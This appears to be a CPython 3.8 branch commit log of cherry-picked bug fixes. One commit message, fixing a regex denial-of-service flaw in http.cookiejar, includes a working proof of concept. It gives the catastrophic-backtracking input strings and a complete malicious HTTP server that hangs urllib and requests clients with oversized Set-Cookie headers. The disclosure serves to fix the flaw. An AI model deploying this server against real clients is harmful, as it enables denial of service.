| Commit message (Collapse) | Author | Age | Files | Lines |
|---|
| | |
|
| |
|
|
|
|
|
|
|
|
|
|
| |
Multiprocessing and concurrent.futures tests now stop the resource
tracker process when tests complete.
Add ResourceTracker._stop() method to
multiprocessing.resource_tracker.
Add _cleanup_tests() helper function to multiprocessing.util: share
code between multiprocessing and concurrent.futures tests.
(cherry picked from commit 9707e8e22d80ca97bf7a9812816701cecde6d226)
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
(GH-17645) (GH-17649)
…
Co-Authored-By: Pablo Galindo <Pablogsal@gmail.com>
(cherry picked from commit 50d4f12958bf806a4e1a1021d70cfd5d448c5cba)
Co-authored-by: Lysandros Nikolaou <lisandrosnik@gmail.com>
https://bugs.python.org/issue39080
|
| |
|
|
| |
Catalina (GH-17636)
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
| |
Commit 6b5b013bcc22 ("bpo-26978: Implement pathlib.Path.link_to (Using
os.link) (GH-12990)") introduced a new link_to method in pathlib. However,
this makes pathlib crash when the 'os' module is missing a 'link' method.
Fix this by checking for the presence of the 'link' method on pathlib
module import, and if it's not present, turn it into a runtime error like
those emitted when there is no lchmod() or symlink().
Signed-off-by: Toke Høiland-Jørgensen <toke@redhat.com>
(cherry picked from commit 092435e932dee1802784ec28f39454f50fdd879a)
Co-authored-by: Toke Høiland-Jørgensen <toke@redhat.com>
|
| |
|
|
|
| |
(cherry picked from commit 8289e27393395ee903bd096d42e07c112d7f15c6)
Co-authored-by: Xtreak <tir.karthi@gmail.com>
|
| |
|
|
|
|
|
|
|
|
|
|
| |
if_stmt (GH-17582) (GH-17589)
When parsing an "elif" node, lineno and col_offset of the node now point to the "elif" keyword and not to its condition, making it consistent with the "if" node.
https://bugs.python.org/issue39031
Automerge-Triggered-By: @pablogsal
(cherry picked from commit 025a602af7ee284d8db6955c26016f3f27d35536)
Co-authored-by: Lysandros Nikolaou <lisandrosnik@gmail.com>
|
| |
|
|
|
|
|
|
|
|
| |
* bpo-39022, bpo-38594: Sync with importlib_metadata 1.3 including improved docs for custom finders and better serialization support in EntryPoints.
* 📜🤖 Added by blurb_it.
* Correct module reference
(cherry picked from commit b7a0109cd2bafaa21a4d50aad307e901c68f9156)
Co-authored-by: Jason R. Coombs <jaraco@jaraco.com>
|
| |
|
| |
Automerge-Triggered-By: @pablogsal
|
| |\
| |
| |
| | |
Python 3.8.1rc1
|
| | | |
|
| | |
| |
| |
| |
| | |
(cherry picked from commit c18b805ac6a2d22176240ca93982fa1fb6559ec7)
Co-authored-by: Tim Gates <tim.gates@iress.com>
|
| | |
| |
| |
| |
| |
| | |
This has happened on some versions of Ubuntu.
(cherry picked from commit bbc4162bafe018f07bab0b624b37974cc33daad9)
Co-authored-by: JohnnyNajera <58344607+JohnnyNajera@users.noreply.github.com>
|
| | |
| |
| |
| |
| | |
(cherry picked from commit 232689b40d8fcbbac27c8705607ff482ea5b46f8)
Co-authored-by: JohnnyNajera <58344607+JohnnyNajera@users.noreply.github.com>
|
| | |
| |
| |
| |
| |
| | |
Also allows winreg.CloseKey() to accept same types as other functions.
(cherry picked from commit ee17e3735634c5fe15a43f897707de8011618627)
Co-authored-by: Steve Dower <steve.dower@python.org>
|
| |/
|
|
|
|
|
| |
deprecation warning (GH-17540)
(cherry picked from commit b8cbe74c3498c617f0e73fd0cdc5c07f2c532092)
Co-authored-by: Steve Dower <steve.dower@python.org>
|
| |
|
|
|
|
|
|
| |
* Issue 38992: avoid fsum test failure
* Add NEWS entry
(cherry picked from commit bba873e633f0f1e88ea12fb935cbd58faa77f976)
Co-authored-by: Mark Dickinson <mdickinson@enthought.com>
|
| |
|
|
|
|
|
| |
(GH-9518) (#17531)
(cherry picked from commit d219cc4180e7589807ebbef7421879f095e72a98)
Co-authored-by: Yury Selivanov <yury@magic.io>
|
| |
|
|
|
|
|
| |
(GH-17311) (#17529)
(cherry picked from commit ab513a38c98695f271e448fe2cb7c5e39eeaaaaf)
Co-authored-by: Kyle Stanley <aeros167@gmail.com>
|
| |
|
|
|
|
|
| |
Fix asyncio when the ssl module is missing: only check for
ssl.SSLSocket instance if the ssl module is available.
(cherry picked from commit 82b4950b5e92bec343a436b3f9c116400b66e1b9)
Co-authored-by: Victor Stinner <vstinner@python.org>
|
| |
|
|
|
|
|
|
| |
Fix test_pty: if the process is the session leader, closing the
master file descriptor raises a SIGHUP signal: simply ignore SIGHUP
when running the tests.
(cherry picked from commit a1838ec2592e5082c75c77888f2a7a3eb21133e5)
Co-authored-by: Victor Stinner <vstinner@python.org>
|
| |
|
|
|
|
| |
This means a clearer message is now shown when patch.object is called with two string arguments, rather than a class and a string argument.
(cherry picked from commit cd90a52983db34896a6335a572d55bdda274778f)
Co-authored-by: Elena Oat <oat.elena@gmail.com>
|
| |
|
|
|
|
|
|
| |
(GH-17421)
https://bugs.python.org/issue38673
(cherry picked from commit 109fc2792a490ee5cd8a423e17d415fbdedec5c8)
Co-authored-by: Batuhan Taşkaya <47358913+isidentical@users.noreply.github.com>
|
| |
|
|
|
|
|
| |
Fix a potential IndexError when passing an empty value to the message-id
parser. Instead, HeaderParseError should be raised.
(cherry picked from commit 3ae4ea1931361dd2743e464790e739d9285501bf)
Co-authored-by: Abhilash Raj <maxking@users.noreply.github.com>
|
| |
|
|
|
|
|
| |
This adds a new InvalidMessageID token to the email header parser which can be
used to represent invalid message-id headers in the parse tree.
(cherry picked from commit 68157da8b42b26408af5d157d2dba4fcf29c6320)
Co-authored-by: Abhilash Raj <maxking@users.noreply.github.com>
|
| |
|
|
|
|
|
|
|
|
| |
now contextvars.ContextVar "__class_getitem__" method returns ContextVar class, not None.
https://bugs.python.org/issue38979
Automerge-Triggered-By: @asvetlov
(cherry picked from commit 28c91631c24e53713ad0e8a2bbae716373f5e53d)
Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
test_openssl_version now accepts version 3.0.0.
getpeercert() no longer returns IPv6 addresses with a trailing new line.
Signed-off-by: Christian Heimes <christian@python.org>
https://bugs.python.org/issue38820
(cherry picked from commit 2b7de6696bf2f924cd2cd9ff0a539c8aa37c6244)
Co-authored-by: Christian Heimes <christian@python.org>
https://bugs.python.org/issue38820
Automerge-Triggered-By: @tiran
|
| |
|
|
|
|
|
|
| |
functions (GH-16457) (#17496)
https://bugs.python.org/issue37404
(cherry picked from commit 892f9e0777f262d366d4747a54c33a1c15a49da6)
Co-authored-by: idomic <michael.ido@gmail.com>
|
| |
|
|
|
|
|
| |
version (GH-17484)
(cherry picked from commit 969ae7aca809a8dacafee04c261110eea0ac1945)
Co-authored-by: Andrew Svetlov <andrew.svetlov@gmail.com>
|
| |
|
|
|
| |
(cherry picked from commit 7ddcd0caa4c2e6b43265df144f59c5aa508a94f2)
Co-authored-by: Andrew Svetlov <andrew.svetlov@gmail.com>
|
| |
|
|
|
|
|
|
|
|
|
|
|
| |
On most platforms, the `environ` symbol is accessible everywhere.
In a dylib on OSX, it's not easily accessible, you need to find it with
_NSGetEnviron.
The code was caching the *value* of environ. But a setenv() can change the value,
leaving garbage at the old value. Fix: don't cache the value of environ, just
read it every time.
(cherry picked from commit 723f71abf7ab0a7be394f9f7b2daa9ecdf6fb1eb)
Co-authored-by: Benoit Hudson <benoit@imgspc.com>
|
| |
|
|
|
| |
(GH-17480)
Note that the support is not actually enabled yet, and so we won't be publishing these packages. However, for those who want to build it themselves (even by reusing the Azure Pipelines definition), it's now relatively easy to enable.
|
| |
|
|
|
|
|
|
|
|
|
|
| |
(GH-13135)
Break cycle generated when saving an exception in socket.py, codeop.py and dyld.py as they keep alive not only the exception but user objects through the ``__traceback__`` attribute.
https://bugs.python.org/issue36820
Automerge-Triggered-By: @pablogsal
(cherry picked from commit b64334cb93d0ddbb551c8cd712942bab2fc72772)
Co-authored-by: Mario Corchero <mcorcherojim@bloomberg.net>
|
| |
|
|
|
|
|
|
|
| |
parse_message_id() was improperly using a token defined inside an exception
handler, which was raising `UnboundLocalError` on parsing an invalid value.
https://bugs.python.org/issue38698
(cherry picked from commit bb815499af855b1759c02535f8d7a9d0358e74e8)
Co-authored-by: Claudiu Popa <pcmanticore@gmail.com>
|
| |
|
|
|
|
|
| |
Use the "volatile" keyword to prevent tail call optimization
on any compiler, rather than relying on compiler specific pragma.
(cherry picked from commit 8b787964e0a647caa0558b7c29ae501470d727d9)
Co-authored-by: Victor Stinner <vstinner@python.org>
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
| |
The readline module now detects if Python is linked to libedit at runtime
on all platforms. Previously, the check was only done on macOS.
If Python is used as a library by a binary linking to libedit, the linker
resolves the rl_initialize symbol required by the readline module against
libedit instead of libreadline, which leads to a segfault.
Take advantage of the existing supporting code to have readline module being
compatible with both situations.
(cherry picked from commit 7105319ada2e663659020cbe9fdf7ff38f421ab2)
Co-authored-by: serge-sans-paille <serge.guelton@telecom-bretagne.eu>
|
| |
|
|
|
| |
(cherry picked from commit 808769f3a4cbdc47cf1a5708dd61b1787bb192d4)
Co-authored-by: Inada Naoki <songofacandy@gmail.com>
|
| |
|
|
|
|
|
| |
format (GH-17418)
(cherry picked from commit a62ad4730c9b575f140f24074656c0257c86a09a)
Co-authored-by: Matthew Rollings <1211162+stealthcopter@users.noreply.github.com>
|
| |
|
|
|
| |
are invoked (GH-17392)
Also fixes some potential segfaults in unraisable hook handling.
|
| |
|
|
|
|
|
|
|
| |
SpooledTemporaryFile.rollback() might cause data corruption
when it is in text mode.
Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
(cherry picked from commit ea9835c5d154ab6a54eed627958473b6768b28cc)
Co-authored-by: Inada Naoki <songofacandy@gmail.com>
|
| |
|
|
|
|
|
| |
entries to prevent infinite recursion (GH-17397)
(cherry picked from commit 9bbcbc9f6dfe1368fe7330b117707f828e6a2c18)
Co-authored-by: Bruno P. Kinoshita <kinow@users.noreply.github.com>
|
| |
|
|
|
|
| |
Extra newlines are removed at the end of non-shell files. If the file only has newlines after stripping other trailing whitespace, all are removed, as is done by patchcheck.py.
(cherry picked from commit 6bf644ec82f14cceae68278dc35bafb00875efae)
Co-authored-by: Terry Jan Reedy <tjreedy@udel.edu>
|
| |
|
|
|
|
|
| |
called (GH-17394)
(cherry picked from commit c7c01ab1e5415b772c68e15f1aba51e520010830)
Co-authored-by: Steve Dower <steve.dower@python.org>
|
| |
|
|
|
| |
(cherry picked from commit e563a155be60fc0757914f87c8138f10de00bb16)
Co-authored-by: Terry Jan Reedy <tjreedy@udel.edu>
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
* fix HTTP Digest handling in request.py
There is a bug triggered when server replies to a request with `WWW-Authenticate: Digest` where `qop="auth,auth-int"` rather than mere `qop="auth"`. Having both `auth` and `auth-int` is legitimate according to the `qop-options` rule in §3.2.1 of [[https://www.ietf.org/rfc/rfc2617.txt|RFC 2617]]:
> qop-options = "qop" "=" <"> 1GH-qop-value <">
> qop-value = "auth" | "auth-int" | token
> **qop-options**: [...] If present, it is a quoted string **of one or more** tokens indicating the "quality of protection" values supported by the server. The value `"auth"` indicates authentication; the value `"auth-int"` indicates authentication with integrity protection
This is description confirmed by the definition of the [//n//]`GH-`[//m//]//rule// extended-BNF pattern defined in §2.1 of [[https://www.ietf.org/rfc/rfc2616.txt|RFC 2616]] as 'a comma-separated list of //rule// with at least //n// and at most //m// items'.
When this reply is parsed by `get_authorization`, request.py only tests for identity with `'auth'`, failing to recognize it as one of the supported modes the server announced, and claims that `"qop 'auth,auth-int' is not supported"`.
* 📜🤖 Added by blurb_it.
* bpo-38686 review fix: remember why.
* fix trailing space in Lib/urllib/request.py
Co-Authored-By: Brandt Bucher <brandtbucher@gmail.com>
(cherry picked from commit 14a89c47983f2fb9e7fdf33c769e622eefd3a14a)
Co-authored-by: PypeBros <PypeBros@users.noreply.github.com>
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to
\d+-\w+-\d+(\s*\s*\s*)$
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.
from http.server import BaseHTTPRequestHandler, HTTPServer
def make_set_cookie_value(n_spaces):
spaces = " " * n_spaces
expiry = f"1-c-1{spaces}!"
return f"b;Expires={expiry}"
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
self.log_request(204)
self.send_response_only(204) GH- Don't bother sending Server and Date
n_spaces = (
int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences
if len(self.path) > 1 else
65506 GH- Max header line length 65536
)
value = make_set_cookie_value(n_spaces)
for i in range(99): GH- Not necessary, but we can have up to 100 header lines
self.send_header("Set-Cookie", value)
self.end_headers()
if __name__ == "__main__":
HTTPServer(("", 44020), Handler).serve_forever()
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
import requests
requests.get("http://localhost:44020/")
* Regression test for http.cookiejar REDoS
If we regress, this test will take a very long time.
* Improve performance of http.cookiejar.ISO_DATE_RE
A string like
"444444" + (" " * 2000) + "A"
could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e)
Co-authored-by: bcaller <bcaller@users.noreply.github.com>
|
| |
|
|
|
|
|
| |
[3.8] (GH-17269) (#17304)
(cherry picked from commit 046442d02bcc6e848e71e93e47f6cde9e279e993)
Co-authored-by: Jason Fried <fried@fb.com>
|
| |
|
|
|
|
|
|
| |
(GH-17126)
https://bugs.python.org/issue37838
(cherry picked from commit 0aca3a3a1e68b4ca2d334ab5255dfc267719096e)
Co-authored-by: benedwards14 <53377856+benedwards14@users.noreply.github.com>
|
| |
|
|
|
|
| |
test_capi: trashcan tests now require the test "cpu" resource.
(cherry picked from commit 0127bb1c5c3286f87e284ff6083133bfdcfd5a4f)
Co-authored-by: Victor Stinner <vstinner@python.org>
|
| |
|
|
|
|
|
|
|
|
|
|
| |
(GH-17294)
on platforms lacking a functional bind() for named unix domain sockets
https://bugs.python.org/issue38841
Automerge-Triggered-By: @asvetlov
(cherry picked from commit 559bad1a70ed50cc9caa7cb303b6ac1fe6a34af3)
Co-authored-by: xdegaye <xdegaye@gmail.com>
|
